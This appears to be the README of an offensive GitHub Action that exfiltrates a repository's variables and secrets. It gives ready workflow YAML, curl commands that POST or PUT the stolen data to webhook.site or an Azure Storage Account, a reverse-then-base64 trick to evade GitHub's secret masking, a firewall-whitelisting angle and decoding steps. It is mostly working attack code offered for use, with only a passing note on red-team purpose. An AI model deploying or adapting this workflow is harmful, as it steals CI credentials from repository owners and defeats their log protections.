```yaml
on: push
jobs:
  exfil:
    runs-on: ubuntu-latest
    name: This will exfil secrets
    steps:
      - uses: offensive-actions/secret-env-exfiltrator@main
        with:
          vars: ${{ toJSON(vars) }}
          secrets: ${{ toJSON(secrets) }}
```
Exfiltrating to webhook.site:

```yaml
on: push
jobs:
  exfil:
    runs-on: ubuntu-latest
    name: This will exfil secrets
    steps:
      - uses: offensive-actions/secret-env-exfiltrator@main
        with:
          vars: ${{ toJSON(vars) }}
          secrets: ${{ toJSON(secrets) }}
          sink: 'webhook.site'
          webhook-site-id: '<site_id>'
```

This sends the data off to https://webhook.site.
Going there will automatically generate an ID you can use for the input variable `webhook-site-id`.

⚠️ Beware: if you do not use the paid version of the service, the exfiltrated data will be readable by anyone with the correct ID (UUID), as well as by the owner of the site.
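Delivery to this sink is presumably just an HTTP POST to the generated URL; the following is a minimal sketch under that assumption, not the Action's actual code (`payload` is a stand-in):

```bash
# Hypothetical sketch: webhook.site captures any request sent to its generated URL,
# so the exfiltrated data can simply be POSTed there and inspected in the site's UI.
payload='<exfiltrated data>'   # stand-in for the encoded vars/secrets
curl -sS -X POST --data "$payload" "https://webhook.site/<site_id>"
```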
Exfiltrating to an Azure Storage Account:

```yaml
on: push
jobs:
  exfil:
    runs-on: ubuntu-latest
    name: This will exfil secrets
    steps:
      - uses: offensive-actions/secret-env-exfiltrator@main
        with:
          vars: ${{ toJSON(vars) }}
          secrets: ${{ toJSON(secrets) }}
          sink: 'azure-storage-account'
          az-storage-account-name: '<storage_account_name>'
          az-storage-container-name: '<container_name>'
          az-storage-sas-token: '<sas_token>'
```

This sink is available because `*.blob.core.windows.net` has to be whitelisted even for firewall-protected self-hosted runners: GitHub itself uses Azure Storage Accounts for writing job summaries, logs, workflow artifacts, and caches (see the documentation).
If your Storage Account has the globally unique name `examplename`, it will be available at https://examplename.blob.core.windows.net...

You should generate a SAS token that allows write-only access for a limited time. The following command generates one that is valid for 10 minutes:
```bash
az storage container generate-sas --account-name <storage_account_name> --name <container_name> --permissions w --expiry $(date -u -d "+10 minutes" +"%Y-%m-%dT%H:%M:%SZ")
```

The Action exfiltrates a JSON document that is first reversed character by character (to circumvent GitHub's masking of secrets in the logs) and then base64-encoded for transport.
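Under that description, the transform plus the Azure upload boil down to a reverse, a base64 encode, and a single authenticated PUT. Here is a minimal sketch; the payload and the blob name `exfil.txt` are made-up assumptions, not taken from the Action's code:

```bash
# Hypothetical sketch of the transform and upload; payload and blob name are illustrative.
payload='{"example":"value"}'   # stand-in for the collected vars/secrets JSON

# Reverse character by character (defeats GitHub's log masking), then base64-encode.
encoded=$(printf '%s' "$payload" | rev | base64 -w0)

# PUT the result as a block blob, authenticating with the write-only SAS token from above.
# The Azure Blob REST API requires the x-ms-blob-type header for a simple Put Blob call.
curl -sS -X PUT \
  -H "x-ms-blob-type: BlockBlob" \
  --data "$encoded" \
  "https://<storage_account_name>.blob.core.windows.net/<container_name>/exfil.txt?<sas_token>"
```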
Follow these steps to make the exfiltrated blob readable again:

```bash
# make all of it readable
echo <output> | base64 -d | rev | jq

# show only the envvars, which get special treatment since they are not in JSON format to begin with
echo <output> | base64 -d | rev | jq -r '.[0].envvars' | base64 -d
```

All the contexts: https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/accessing-contextual-information-about-workflow-runs

Printing context to logs: https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/accessing-contextual-information-about-workflow-runs#about-contexts
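As a quick sanity check of the whole pipeline, here is a round trip with a made-up payload that mimics the structure the decode commands above expect (the field contents are illustrative only):

```bash
# Build a sample payload whose envvars field is itself base64, as the jq filter implies.
sample='[{"envvars":"'$(printf '%s' 'FOO=bar' | base64 -w0)'"}]'

# Encode the way the Action does: reverse character by character, then base64.
encoded=$(printf '%s' "$sample" | rev | base64 -w0)

# Decode with the steps from above; prints: FOO=bar
echo "$encoded" | base64 -d | rev | jq -r '.[0].envvars' | base64 -d
```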
Status:

- The logs sink works on all OSs.
- The Azure Storage sink works only on Ubuntu; on Windows curl fails with "too many arguments", and on macOS there is a weird problem with awk. However, it worked for the logs sink, so I don't get it.
- If exfiltration to webhook.site or Azure fails, the Action still succeeds, since HTTP errors are not treated as errors in general. Change that? (See the sketch below this list.)
- Fix Azure exfil for Windows and macOS.
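One possible fix for the silent-failure issue, sketched as an assumption about how a sink step could be hardened rather than as the Action's current code: let curl itself fail on HTTP error responses and propagate the exit code, which makes the workflow step fail.

```bash
# --fail makes curl return a non-zero exit code on HTTP 4xx/5xx responses,
# so a broken sink would fail the step (and thus the job) instead of passing silently.
curl --fail -sS -X POST --data "$payload" "https://webhook.site/<site_id>" \
  || { echo "exfil failed" >&2; exit 1; }
```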
